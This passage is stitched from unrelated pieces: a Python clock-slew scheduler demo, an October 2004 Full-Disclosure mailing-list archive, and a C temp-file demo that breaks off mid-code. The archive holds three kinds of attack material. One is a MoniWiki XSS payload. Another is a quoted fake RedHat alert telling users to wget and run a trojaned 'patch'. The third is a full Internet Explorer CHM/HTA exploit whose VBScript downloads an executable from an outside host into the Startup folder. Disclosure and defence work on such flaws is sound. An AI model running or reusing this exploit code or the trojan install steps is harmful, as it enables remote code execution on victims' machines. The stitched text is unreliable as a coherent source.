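slewed clock as seen by a naive once-per-second scheduler.

The thread's claim is that NTP normally slews the local clock while SNTP
clients jump it, and that a jump can make a cron-like daemon miss a job.
Everything below is constructed: the 90 s error, the job times, the 5 s
lateness tolerance, and the slew rate of 0.01 s/s (ntpd caps slew at
0.0005 s/s, i.e. 500 ppm; the larger value only keeps the run short).
"""
from typing import Dict, Iterable, Iterator, List

MAX_LATE = 5.0  # constructed: a job found more than 5 s past its slot is dropped


def step_readings(start: float, error: float, ticks: int,
                  step_at: int = 1) -> Iterator[float]:
    """Wall-clock readings, one per real second, when the whole correction
    `error` is applied as a single jump just before reading `step_at`.
    A negative `error` models a clock that is set back."""
    t = start
    for i in range(ticks):
        if i == step_at:
            t += error
        yield t
        t += 1.0


def slew_readings(start: float, error: float, ticks: int,
                  rate: float) -> Iterator[float]:
    """Readings when the clock is slewed: it runs fast (or slow) by at most
    `rate` seconds per second until the full `error` has been absorbed, so
    it never jumps and never runs backwards."""
    t = start
    remaining = error
    for _ in range(ticks):
        yield t
        adj = max(-rate, min(rate, remaining))
        remaining -= adj
        t += 1.0 + adj


def run_scheduler(readings: Iterable[float], job_times: List[float],
                  max_late: float = MAX_LATE) -> Dict[float, int]:
    """Minimal cron-like loop: on each wake-up, fire every job whose scheduled
    time was crossed since the previous reading, unless the clock is already
    more than `max_late` seconds past it. Returns job_time -> fire count."""
    fired = {jt: 0 for jt in job_times}
    prev = None
    for now in readings:
        if prev is not None:
            for jt in job_times:
                if prev < jt <= now and now - jt <= max_late:
                    fired[jt] += 1
        prev = now
    return fired


def compare(error: float, job_times: List[float], ticks: int = 240,
            step_at: int = 5, rate: float = 0.01) -> Dict[str, Dict[float, int]]:
    """Runs the same job list against a stepped and a slewed clock."""
    return {
        "step": run_scheduler(step_readings(0.0, error, ticks, step_at), job_times),
        "slew": run_scheduler(slew_readings(0.0, error, ticks, rate), job_times),
    }


if __name__ == "__main__":
    # Clock 90 s slow, jobs at t=30 and t=200: the step jumps over the first job.
    print("forward correction:", compare(90.0, [30.0, 200.0]))
    # Clock 30 s fast, job at t=10: the backward step makes it run twice.
    print("backward correction:", compare(-30.0, [10.0], ticks=60, step_at=20))
```

The backward case shows the other half of the problem: a clock set back re-crosses a job time, so a job that is meant to run once runs twice.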



 
[Full-Disclosure] STG Security Advisory: [SSA-20041022-08] MoniWiki XSS vulnerability

From: SSR Team (advisorystgsecurity.com)
Date: Sun Oct 24 2004 - 21:02:20 CDT



STG Security Advisory: [SSA-20041022-08] MoniWiki XSS vulnerability

Revision 1.0
Date Published: 2004-10-22 (KST)
Last Update: 2004-10-22
Disclosed by SSR Team (advisorystgsecurity.com)

Summary
========
MoniWiki is a wiki web application used by many Korean Linux users.

It has a cross site scripting vulnerability.

Vulnerability Class
===================
Implementation Error: Input validation flaw

Details
=======
Due to an input validation flaw, MoniWiki is vulnerable to cross site
scripting attacks.

http://[victim]/wiki.php/<script>alert("XSS Vulnerability exists")</script>

Impact
======
Medium: Malicious attackers can inject and execute arbitrary script code in
a user's browser session in context of an affected site.

Solution
=========
Update to MoniWiki 1.0.9

Affected Products
================
MoniWiki 1.0.8 and prior

Vendor Status: FIXED
=======================
2004-09-30 Vulnerability found.
2004-09-30 MoniWiki developer notified.
2004-10-21 MoniWiki 1.0.9 released.
2004-10-22 Official release.

Credits
======
Jeremy Bae at STG Security




 
Re: [Full-Disclosure] Possibly a stupid question RPC over HTTP

From: Kyle Maxwell (krmaxwellgmail.com)
Date: Sun Oct 24 2004 - 22:30:13 CDT


On Fri, 22 Oct 2004 14:50:23 +0100, Airey, John <john.aireyrnib.org.uk> wrote:
> > -----Original Message-----
> > From: Kyle Maxwell [mailto:krmaxwellgmail.com ]
> > I think you may mean something slightly differently; given any large
> > prime p, I can factor it completely extremely quickly:
> >
> > p = 1 * p
> >
> > There are no other factors; this *is* the prime factorization. :) Bill
>
> Oh no, the whole security of computing has just fallen over, since you've shown that primes don't exist. What next, proving that black is white and getting run over on a zebra crossing?
>
> A prime is defined as being divisible by itself and 1 only, so for the purpose of the definition, 1 is not a factor.

<flame>
I was trying to give you the benefit of the doubt in my explanation,
but your response makes it clear that you're not thinking straight. By
your (almost correct) definition of prime, the factorization is
trivial! And yes, 1 is a factor. If you can break the prime into ANY
other factors, then it's NOT a prime.

You're talking about solving a problem that DOESN'T EXIST BY
DEFINITION. Re-read my response -- this time without being stupid --
and you'll see that I was trying to explain to you that the problem is
the general factoring of large numbers (into primes for what should be
obvious reasons). This is NOT the same as factoring large primes as
that's a solved problem. If this is still difficult to understand, any
handy grade-school maths book should provide additional explanation.
Testing for primality, which is a related but different problem, is
solved, but proving that a number is composite is unfortunately not
the same as knowing its factors.
</flame>

As to the question of whether this is a solved problem: we may have to
agree to disagree; if it were the NSA, given their past interactions
with the crypto community, I think it likely that they'd have over
time moved to another type of cryptography. BTW, brute forcing a key
does not break the system -- and as others have shown in this thread,
it's impossible to precompute all the keys unless you've broken every
single PRNG out there, and that's even less likely.

--
Kyle Maxwell
[krmaxwellgmail.com]



 
Re: [Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

From: Vincent Archer (vardeny-all.com)
Date: Mon Oct 25 2004 - 04:01:53 CDT


On Sun, Oct 24, 2004 at 07:51:09PM -0400, Harry Hoffman wrote:
> haha, that's pretty funny. If they were going to do something like that
> it should have at least been in a rpm format.

Considering you can put an executable script inside, if I remember right.

> I'm hoping that this doesn't need to be said but if neither
> "yum check-update || up2date -l" report anything then chances are there
> are no "Official Fedora Updates"
>
> --Harry
>
>
>
> Hugo van der Kooij wrote:
> >-----BEGIN PGP SIGNED MESSAGE-----
> >
> >Be advised.
> >
> >The message below is currently going around on internet. Being unsinged
> >was the first obvious issue. Not pointing to RPM updates, being in a
> >different format and such were among the other reasons to suspect it.
> >
> >Message was sent from 'University of Texas at Arlington'.
> >
> >I am sure none of you should be fooled by such a message but others might
> >be.
> >
> >And while it lasts you may want to get the file for your own educational
> >purposes.
> >
> >Hugo.
> >- ---------- Forwarded message ----------
> >Date: Sun, 24 Oct 2004 17:22:20 -0500
> >From: RedHat Security Team <securityredhat.com>
> >To: *****************
> >Subject: RedHat: Buffer Overflow in "ls" and "mkdir"
> >
> >
> >[logo_rh_home.png]
> >
> >Original issue date: October 20, 2004
> >Last revised: October 20, 2004
> >Source: RedHat
> >
> >A complete revision history is at the end of this file.
> >
> >Dear RedHat user,
> >
> >Redhat found a vulnerability in fileutils (ls and mkdir), that could
> >allow a remote attacker to execute arbitrary code with root privileges.
> >Some of the affected linux distributions include RedHat 7.2, RedHat 7.3,
> >RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is
> >known that *BSD and Solaris platforms are NOT affected.
> >
> >The RedHat Security Team strongly advises you to immediately apply the
> >fileutils-1.0.6 patch. This is a critical-critical update that you must
> >make by following these steps:
> >
> > * First download the patch from the Security RedHat mirror: wget
> > www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
> > * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
> > * cd fileutils-1.0.6.patch
> > * make
> > * ./inst
> >
> >Again, please apply this patch as soon as possible or you risk your
> >system and others` to be compromised.
> >
> >Thank you for your prompt attention to this serious matter,
> >
> >RedHat Security Team.
> >
> >Copyright (C) 2004 Red Hat, Inc. All rights reserved.
> >
> >
> >-----BEGIN PGP SIGNATURE-----
> >Version: GnuPG v1.2.3 (GNU/Linux)
> >
> >-----END PGP SIGNATURE-----
> >

--
Vincent ARCHER
varcherdenyall.com

Tel : +33 (0)1 40 07 47 14
Fax : +33 (0)1 40 07 47 27
Deny All - 5, rue Scribe - 75009 Paris - France
www.denyall.com



 
Re: [Full-Disclosure] Help, possible rootkit

From: Harry de Grote (rik.bobbaerscc.kuleuven.ac.be)
Date: Mon Oct 25 2004 - 03:58:33 CDT


On Sunday 24 October 2004 15:59, Ali Campbell wrote:
> BillyBob wrote:
> > Any more suggestions ?
>
> I have seen something similar to this behaviour caused by a flaky power
> connector in a Si3112 mirrored RAID array.

or it's highly possible that your windows is just unstable :)

(which is true in most cases)

--
harry
aka Rik Bobbaers

K.U.Leuven - LUDIT -=- Tel: +32 485 52 71 50
Rik.Bobbaerscc.kuleuven.ac.be -=- http://harry.ulyssis.org

"\x41\x20\x63\x6f\x6d\x70\x75\x74\x65\x72\x20\x77\x69\x74\x68\x6f\x75\x74\x20"
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x69\x73\x20\x6c\x69\x6b\x65\x20\x61\x20\x66"
"\x69\x73\x68\x20\x77\x69\x74\x68\x6f\x75\x74\x20\x61\x20\x62\x69\x63\x79\x63"
"\x6c\x65\x0a\x00"



 
RE: [Full-Disclosure] Help, possible rootkit

From: Alan Melia (Melmac) (alanmemelmac.co.uk)
Date: Mon Oct 25 2004 - 04:59:04 CDT


Sorry but something MUST show up. Enable 'Context Switch Delta' and I/O
stuff. Then inspect the process/thread with the highest Context Switch.

The most probable cause if it shows up against system is some faulty
hardware generating high hardware interrupts. You do not have any evidence
that a rootkit is involved. IMHO never overlook the obvious.

Alan

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of BillyBob
Sent: 23 October 2004 21:30
To: Alan Melia (Melmac); 'Full Disclosure'
Subject: Re: [Full-Disclosure] Help, possible rootkit

I have run Process Explorer, Code Stuff Starter but nothing shows up in the
list as using this 25-30% of my CPU. I also updated and ran PestPatrol,
NortonAV, etc but nothing is detected which is why I think I have a rootkit
that has patched the kernel and is therefore not allowing any of these programs
to detect it.

Anything else ?

----- Original Message -----
From: "Alan Melia (Melmac)" <alanmemelmac.co.uk>
To: "'BillyBob'" <billybobknobhotmail.com>; "'Full Disclosure'"
<full-disclosurelists.netsys.com>
Sent: Saturday, October 23, 2004 4:47 PM
Subject: RE: [Full-Disclosure] Help, possible rootkit

> First check to see what processes are running. TaskList is built in
> but I would recommend.
> http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
>
> Get to know your machine and what processes are running normally.
> With 25-30% CPU it should stick out like a sore thumb.
>
> Oh yeah don't run as admin (see http://blogs.msdn.com/aaron_margosis).
>
> Alan
>
>
> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of BillyBob
> Sent: 23 October 2004 17:05
> To: Full Disclosure
> Subject: [Full-Disclosure] Help, possible rootkit
>
> I have noticed that my XP system is behaving like I have a rootkit.
>
> - My mouse is jumpy (it freezes for a second when I move it around the
> desktop) and the minimized Taskmanager in the systray shows I have
> around
> 25 - 30 % usage, but when I open it, there is no process listed using
> this much.
> - I did a netstat, fport, openports and none of these show that I have
> any odd ports open or any connections established.
> - even when I disconnect from the Internet these symptoms do not stop.
> They stop if I reboot, but then start again.
>
> I have run VICE, Klister, PatchFinder and RkDetect from rootkit.com
> and they could not find anything.
>
> Any more suggestions ?
> Any more rootkit finding tools for Windows ?
>
> Thanks
> Bill
>
>
>



 
[Full-Disclosure] FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"

From: Feher Tamas (etomcatfreemail.hu)
Date: Mon Oct 25 2004 - 05:18:24 CDT


Hello,

Read these:

http://www.redhat.com/security/
http://www.f-secure.com/weblog/#00000323

>The message below is currently going around on internet.
>Being unsinged was the fist obvious issue.

Do you really expect a singing security alert from RedHat? I
think the all singing, all dancing security bulletins are a
M$ specialty.

Regards: Tamas Feher.



 
Re: [Full-Disclosure] Mozilla Thunderbird 0.8 / Firefox 0.9.3 temporary files (local)

From: Daniel Veditz (dveditzcruzio.com)
Date: Mon Oct 25 2004 - 06:08:53 CDT


This was fixed Friday (bug 251297) and the fix will be in next versions of
Mozilla products.

It looks like the bug was introduced last March which would make Mozilla 1.7
and Firefox 0.9 and later vulnerable, Mozilla 1.6 and Firefox 0.8 and
earlier OK. Thunderbird has been vulnerable from version 0.6 on.

-Dan Veditz

Martin wrote:
>
> Mozilla Thunderbird 0.8 / Firefox 0.9.3 temporary files (local)
>
> Martin (broadcastptraced.net)
>
> -------------------
> Program Description
> -------------------
>
> "Thunderbird, our latest email program, includes intelligent spam
> filters, spell-checking, security, customization, and newsgroups
> support."
>
> www.mozilla.org
>
> -------------------
> Problem Description
> -------------------
>
> When opening an attachment, or a link included in an email, Thunderbird
> prompts the user with a dialog box, giving the choice to "Save to Disk"
> or to "Open with" <default program>.
>
> For example, we receive a PDF document attached, and on the Attachments
> section, we choose "Open".
>
> broadcast:/tmp$ ls -l *.pdf
> -rw------- 1 broadcast broadcast 2002560 2004-10-24 18:38 wskbq43m.pdf
>
> While the dialog box is still open, the file permissions are OK, and the
> filename is random (except for the extension).
> If we choose to save it to disk, and check /tmp again:
>
> broadcast:/tmp$ ls -l *.pdf
> ls: *.pdf: No such file or directory
>
> Great, it's gone. Now let's choose to open it with the default viewer
> (in my case, xpdf).
> Again, while the dialog box is open, there are no apparent problems.
>
> broadcast:/tmp$ ls -l *.pdf
> -rw------- 1 broadcast broadcast 2002560 2004-10-24 18:42 hp1h30si.pd
>
> But after choosing to open it with xpdf:
>
> broadcast:/tmp$ ls -l *.pdf
> -rw-r--r-- 1 broadcast broadcast 2002560 2004-10-24 18:42 programming.pdf
>
> The file becomes world readable, until the user closes xpdf, or whatever
> application he chose to read the attachment.
> Also, the filename becomes predictable, but if the filename already
> exists on /tmp, Thunderbird will choose a similar filename, and won't
> work on the existing one.
>
> This exact issue affects Mozilla Firefox 0.9.3. I haven't tested
> older/newer versions, and all of this was tested under Debian Unstable.
>
> A copy of this advisory and future updates on this issue may be found on:
> http://broadcast.ptraced.net/advisories/008-firefox.thunderbird.txt



 
[Full-Disclosure] re: How to Break Windows XP SP2 + Internet Explorer 6 SP2

From: Michael Evanchik (MikeMichaelEvanchik.com)
Date: Sun Oct 24 2004 - 22:35:42 CDT


I have created a PoC for this http://www.michaelevanchik.com/kara/scrolll/notagain.txt

and for those of you scared to click links these days , here is the contents

Microsoft Internet Explorer ms-its scheme/CHM remote code execution

Oct, 24 2004

Vulnerable
----------
- Microsoft Internet Explorer 6.0 (lower was not tested)
- Microsoft Windows XP Pro
- Microsoft Windows XP Home
- Microsoft Windows 2003 Server Enterprise

not tested if vulnerable
------------------------
- Microsoft Windows 98
- Microsoft Internet Explorer 5.x

Not Vulnerable
--------------
- Microsoft Windows 2000
- Microsoft Windows 2000 Server

Severity
---------
Critical - Remote code execution, little user intervention

In English
----------
   You can run executable code with a series of html codes on an XP system. It's getting harder and harder these days so be ready for a long confusing paper. I am posting this proof of concept because as most of us know Microsoft will dismiss the last advisory (from http-equiv) and not provide us with patches for months and maybe years.

Tech Stuff and Explanation
--------------------------
http://www.michaelevanchik.com/kara/scrolll/files.zip <-- download all files here

1. Create an image file with the following source code that http-equiv gave us into a comment section on an image file. I used Photoshop in the file menu > file info > comment field. From there I saved the file as a jpeg file and then renamed it to malwarez6.mcb

Here is the code http-equiv gave us, i just changed it around to inject the hta file into start up instead.

<script language="vbs">
Dim Conn, rs
Set Conn = CreateObject("ADODB.Connection")
Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _
"Dbq=http://arite.zapto.org;" & _
"Extensions=asc,csv,tab,txt;" & _
"Persist Security Info=False"
Dim sql
sql = "SELECT * from foobar.txt"
set rs = conn.execute(sql)
set rs =CreateObject("ADODB.recordset")
rs.Open "SELECT * from foobar.txt", conn
rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\real scheduler.hta", adPersistXML
rs.close
conn.close
</script>

There is one thing you need to know about this code. Oddly "select * from foobar.txt" not only runs a GET command for "foobar.txt" on the web server, it also logs in anonymous to a FTP server on the same host. If your server does not allow both, the vulnerability will not work.

2. foobar.txt was the most difficult part for me. From the information http-equiv gave us, it seems this vulnerability could have been dismissed since you could not fit enough scriptable code into the hta file without the script compiler erroring due to binary ASCII code messing up the vbscript. What I uncovered was this text file needed to be in a comma delimited format. Not only that, each side of each line of code needed to be padded with a dummy variable to keep the code "alive" so it would not error. Notice the variable "crap" and the first and last lines were also dummies which the code would not have worked without. HTA files are still a BIG hole for Microsoft. All the patching they have done to exploits, and the creation of XP Service Pack 2 was a godsend, but yet HTA files do not apply to ANY of these new features. So I ended up putting an old and easy exe running exploit inside this hta file.

foobar.txt
-----------------------------------------
"meaning less shit i had to put here"
"<script language=vbscript> crap = """
""": on error resume next: crap = """
""" : set o = CreateObject(""msxml2.XMLHTTP"") : crap="""
""" : o.open ""GET"",""http://hometown.aol.com/mcbain/calc.exe"",False : crap="""
""" : o.send : crap="""
""" : set s = createobject(""adodb.stream"") : crap="""
""" : s.type=1 : crap="""
""" : s.open : crap="""
""" : s.write o.responseBody : crap="""
""" : s.savetofile ""C:\Documents and Settings\All Users\Start Menu\Programs\Startup\RealAudio.exe"",2 : crap="""
"""</script> crap="""
--------------end foobar.txt--------------------

3. In index.html notice the following key code:

<img id="dyn" src="malwarez6.mcb" border="0">

According to http-equiv's (malware.com) post he was using a file with no extension. This did not work for me on IIS server so I used an extension that was not used (.mcb). From there in IIS management console I added this mime type manually (.mcb text/html) entry. This image now gets by Microsoft's patch of not allowing executable content to be "draggable". Microsoft seems to check (no matter what extension of the file you use, or content type your http server sends) the file internally to see if it is not an executable file.

4. create a file cigar.hhk. The code in this file is self explanatory

5. create frame.html. Most somewhat self explanatory, though note the following code..

 <OBJECT style="height:650" style="width:250" id="hhctrl" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194" width=7% height=7% style="position:absolute;top:140;left:72;z-index:100;">
    <PARAM name="Command" value="Index">
    <PARAM name="Item1" value="cigar.hhk">click me
</OBJECT>

I could not get this object auto clicked with hhctrl.click() unfortunately, for now this is the only user intervention part. But when a user clicks this object, it runs the html file in local zone, bypassing XP Service Pack 2 for the second time in this exploit.

6. Upload hhtctrl.ocx for the computers that don't happen to have this control. All XP's seem to have this by default, some win2k3's do not

Proof of Concept?
----------------
- http://www.michaelevanchik.com/kara/scrolll/index.html

- scroll down on this webpage and click the display button as directed.

- you will then notice a hta file in your start > programs > start up > real scheduler.hta

- from here when that is run you will get Real Audio.exe, alternatively the hta file is basically remote execution at that point anyway.

Vendor Recommendations
---------------------
- Microsoft needs to apply XP Service Pack 2's local zone exploit lockdown to .HTA files as well

- Microsoft should disable adodb.recordsets .save method for writing to hard drives.

- As always Microsoft should pay BETTER people to test their software instead of rewards for
  virus writers

- Microsoft should not dismiss any vulnerabilities as "not a vulnerability itself" problems
  since if combined with other "not a vulnerability itself" bugs lead to THE PROBLEM

Temp Fix
-------------
- Disable hta files.
- Disable scripting in Internet Explorer
- Do not use Internet Explorer, use Mozilla Firebird (now known as FireFox www.mozilla.org)

Credit
------
Http equiv - without him, i wouldn't have a clue

mikx - http://www.mikx.de/scrollbar/ for his genius killer scrollbars!

Greets
------
- slacker my other brain
- illwill at illmob.org
- abe,rain and dolan

Contact
-------
MikeMichaelEvanchik.com
http://www.MichaelEvanchik.com - me

http://Software.High-Pow-er.com - Need a professional programmer?
http://www.High-Pow-er.com - Other, Security, Consulting



 
RE: [Full-Disclosure] RE: Full-Disclosure digest

From: Todd Towles (toddtowlesbrookshires.com)
Date: Mon Oct 25 2004 - 07:58:57 CDT


Maybe because they are e-mail borne and if you haven't noticed, you post
on here via e-mail? This list is open, therefore as long as people don't
fix their computers, you will get viruses. Welcome to FD =)

> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
> digitalchaos
> Sent: Friday, September 03, 2004 4:27 AM
> To: full-disclosurelists.netsys.com
> Subject: [Full-Disclosure] RE: Full-Disclosure digest
>
> Why are there viruses being transmitted through this newsgroup??
>
> OUTPUT FROM MCAFEE:
> ****************** McAfee VirusScan ************************
> ******* Alert generated at: Thu, 02 Sep 2004 13:15:00 -0500 *********
> *********************************************************************
>
> McAfee VirusScan has detected a potential threat in this
> e-mail sent by full-disclosure-requestlists.netsys.com.
> The following actions were attempted on each suspicious part.
> We strongly recommend that you report this virus-related
> activity to full-disclosure-requestlists.netsys.com.
>
>
> The attachment "E-mail body" is infected with the
> W32/Bagle.aaMM Virus(es).
> This attachment has been quarantined.
>
>
> This is not the only message I have received like this
>
> Some were infected by NETSKY, various zip/pif virus, and such.
>
>
>
> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
> full-disclosure-requestlists.netsys.com
> Sent: Friday, October 22, 2004 9:24 AM
> To: full-disclosurelists.netsys.com
> Subject: Full-Disclosure digest, Vol 1 #1996 - 8 msgs
>
>
>
>



 
[Full-Disclosure] [ GLSA 200410-24 ] MIT krb5: Insecure temporary file use in send-pr.sh

From: Thierry Carrez (koongentoo.org)
Date: Mon Oct 25 2004 - 08:09:14 CDT


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-24
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: MIT krb5: Insecure temporary file use in send-pr.sh
      Date: October 25, 2004
      Bugs: #66359
        ID: 200410-24

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The send-pr.sh script, included in the mit-krb5 package, is vulnerable
to symlink attacks, potentially allowing a local user to overwrite
arbitrary files with the rights of the user running the utility.

Background
==========

MIT krb5 is the free implementation of the Kerberos network
authentication protocol written by the Massachusetts Institute of
Technology.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 app-crypt/mit-krb5 <= 1.3.5 >= 1.3.5-r1
                                                          *>= 1.3.4-r1

Description
===========

The send-pr.sh script creates temporary files in world-writeable
directories with predictable names.

Impact
======

A local attacker could create symbolic links in the temporary files
directory, pointing to a valid file somewhere on the filesystem. When
send-pr.sh is called, this would result in the file being overwritten
with the rights of the user running the utility, which could be the
root user.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All MIT krb5 users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=app-crypt/mit-krb5-1.3.4-r1"
    # emerge ">=app-crypt/mit-krb5-1.3.4-r1"

References
==========

  [ 1 ] CAN-2004-0971
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0971

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-24.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0




 
Re: [Full-Disclosure] RE: Full-Disclosure digest

From: steve menard (smenardnbnet.nb.ca)
Date: Mon Oct 25 2004 - 09:05:53 CDT


Todd Towles wrote:

>Maybe because they are e-mail borne and if you haven't noticed, you post
>on here via e-mail? This list is open, therefore as long as people don't
>fix their computers, you will get viruses. Welcome to FD =)
>
>
>
>>-----Original Message-----
>>From: full-disclosure-adminlists.netsys.com
>>[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of
>>digitalchaos
>>Sent: Friday, September 03, 2004 4:27 AM
>>To: full-disclosurelists.netsys.com
>>Subject: [Full-Disclosure] RE: Full-Disclosure digest
>>
>>Why are there virus being transmitted through this newsgroup??
>>
>>OUTPUT FROM MCAFEE:
>>****************** McAfee VirusScan ************************
>>******* Alert generated at: Thu, 02 Sep 2004 13:15:00 -0500 *********
>>*********************************************************************
>>
>>
>>

Since I don't get the digest and rarely see the viruses. . . . .
unless your ISP filters; remember you should implement security in
layers, possibly consider it the first line of defense [each should have
protection as well.] these virii will get through. (my ISP does
[they are using brightstor; -not a testimonial-; based on the few
ripped-apart messages that do get through] it can be really tough to
get some example code through sometimes_not_ And I have told the only
prefs available to me & through help desk not to scan my mail ; but it
does... dang corporate policy for major Canadian telephone company;....
Imagine now; they still want me to pay an additional $5.00 /month to get
me a desktop client, but I don't get the viruses because they already
filter ;-p )

Likewise I know I cannot trust this account for receiving any files
because they are intercepted
each and everyone ; some still get through ; user [admin or not] beware

;-0

steve



 
Re: [Full-Disclosure] Q: Linux Command Line Encryption

From: Denis Dimick (denisdimick.net)
Date: Mon Oct 25 2004 - 10:33:41 CDT


Use GPG and keychain to store the key.

On Sun, 24 Oct 2004, Bruno Wolff III wrote:

> On Fri, Oct 22, 2004 at 17:48:26 +0000,
> Ali Campbell <fdisclosurealicampbell.org.uk> wrote:
> >
> > I need a Linux utility which I can use to encrypt a single gzipped file
> > via the command line. Obviously something open source would be
> > preferable. I'm not really interested in setting up a whole suite of
> > stuff with keyfiles and so on, and I don't need a public/private key
> > setup, just something quick and dirty with a single secret key for
> > encryption and decryption which is nevertheless reasonably strong.
>
> If you are only automating encryption and not decryption and not signing
> for integrity, you should probably reconsider using public keys since
> that way you don't have to make a password available to your script.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>



 
[Full-Disclosure] [ GLSA 200410-25 ] Netatalk: Insecure tempfile handling in etc2ps.sh

From: Luke Macken (lewkgentoo.org)
Date: Mon Oct 25 2004 - 11:06:19 CDT


- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-25
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Netatalk: Insecure tempfile handling in etc2ps.sh
      Date: October 25, 2004
      Bugs: #66370
        ID: 200410-25

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The etc2ps.sh script, included in the Netatalk package, is vulnerable
to symlink attacks, potentially allowing a local user to overwrite
arbitrary files with the rights of the user running the utility.

Background
==========

Netatalk is a kernel level implementation of the AppleTalk Protocol
Suite, which allows Unix hosts to act as file, print, and time servers
for Apple computers. It includes several script utilities, including
etc2ps.sh.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 net-fs/netatalk < 1.6.4-r1 >= 1.6.4-r1

Description
===========

The etc2ps.sh script creates temporary files in world-writeable
directories with predictable names.

Impact
======

A local attacker could create symbolic links in the temporary files
directory, pointing to a valid file somewhere on the filesystem. When
etc2ps.sh is executed, this would result in the file being overwritten
with the rights of the user running the utility, which could be the
root user.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Netatalk users should upgrade to the latest version:

    # emerge sync

    # emerge -pv ">=net-fs/netatalk-1.6.4-r1"
    # emerge ">=net-fs/netatalk-1.6.4-r1"

References
==========

  [ 1 ] CAN-2004-0974
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0974

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-25.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQBBfSR6Rsm3eDkOu7kRAo0QAJ4rIKpgy4yPW+GrKEQdsmHjUV4STACgjxuD
80kGW7+ZZfujlES+lB90EfU=
=hWRS
-----END PGP SIGNATURE-----


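Both Gentoo advisories above (200410-24 for send-pr.sh and 200410-25 for etc2ps.sh) describe the same bug class: a temporary file with a guessable name, created in a directory anyone can write to, opened in a way that follows whatever already sits at that name. The program below is an added example, not code from mit-krb5, Netatalk or Gentoo. It reproduces the class in C inside a private scratch directory (all file names are constructed for the demo) and puts the two hardened idioms next to it. It assumes a writable /tmp.

```c
/* Added example, not code from mit-krb5, Netatalk or Gentoo. It reproduces
 * the predictable-temp-file bug class behind CAN-2004-0971 and
 * CAN-2004-0974 inside a private scratch directory and puts the hardened
 * forms next to it. Every file name here is constructed for the demo. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define DEMO_UNSAFE_FOLLOWED 1  /* plain open() wrote through the symlink   */
#define DEMO_EXCL_REFUSED    2  /* O_EXCL|O_NOFOLLOW refused the symlink    */
#define DEMO_MKSTEMP_OK      4  /* mkstemp() gave a fresh 0600 regular file */

/* Vulnerable pattern: a predictable name (only the PID varies) opened with
 * O_CREAT|O_TRUNC. If a symlink already sits at that name, open() follows
 * it, so the link *target* is truncated and overwritten. */
static int unsafe_tempfile(const char *dir, char *out, size_t outsz) {
    snprintf(out, outsz, "%s/send-pr.%ld", dir, (long)getpid());
    return open(out, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened: mkstemp() picks a random suffix and creates the file with
 * O_CREAT|O_EXCL and mode 0600, so a planted link is never followed. */
static int safe_tempfile(const char *dir, char *out, size_t outsz) {
    snprintf(out, outsz, "%s/send-pr.XXXXXX", dir);
    return mkstemp(out);
}

/* Hardened, fixed name: refuse links and refuse anything pre-existing. */
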